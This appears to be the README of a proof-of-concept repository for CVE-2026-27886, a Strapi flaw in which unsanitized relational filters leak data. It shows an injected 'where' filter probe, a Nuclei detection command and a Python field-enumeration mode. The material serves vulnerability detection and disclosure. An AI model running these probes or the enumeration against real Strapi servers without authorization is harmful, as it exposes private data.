Share
## https://sploitus.com/exploit?id=589E6F35-B762-5B4B-B0FB-962CF7D8A206
# CVE-2026-27886 Strapi PoC

> For authorized security testing only.

[Strapi leaking sensitive data via relational filtering due to lack of query sanitization](https://github.com/strapi/strapi/security/advisories/GHSA-rjg2-95x7-8qmx).

Includes:

* `CVE-2026-27886.py` - Python PoC
* `CVE-2026-27886.yaml` - Nuclei template for detection

## What it checks

The checker sends two requests to a public Strapi Content API collection endpoint:

```text
GET /api/
GET /api/?where[id][$lt]=-1
```

If the baseline response has records and the false `where` predicate collapses the result set to zero, the endpoint is likely vulnerable.

## Usage

### Python

Safe check:
```bash
python3 CVE-2026-27886.py http://strapi/api/articles
```

Field enumeration:

```bash
python3 CVE-2026-27886.py http://strapi/api/articles --enum-fields
```

### Nuclei

```bash
nuclei -t CVE-2026-27886.yaml -u http://strapi/api/articles
```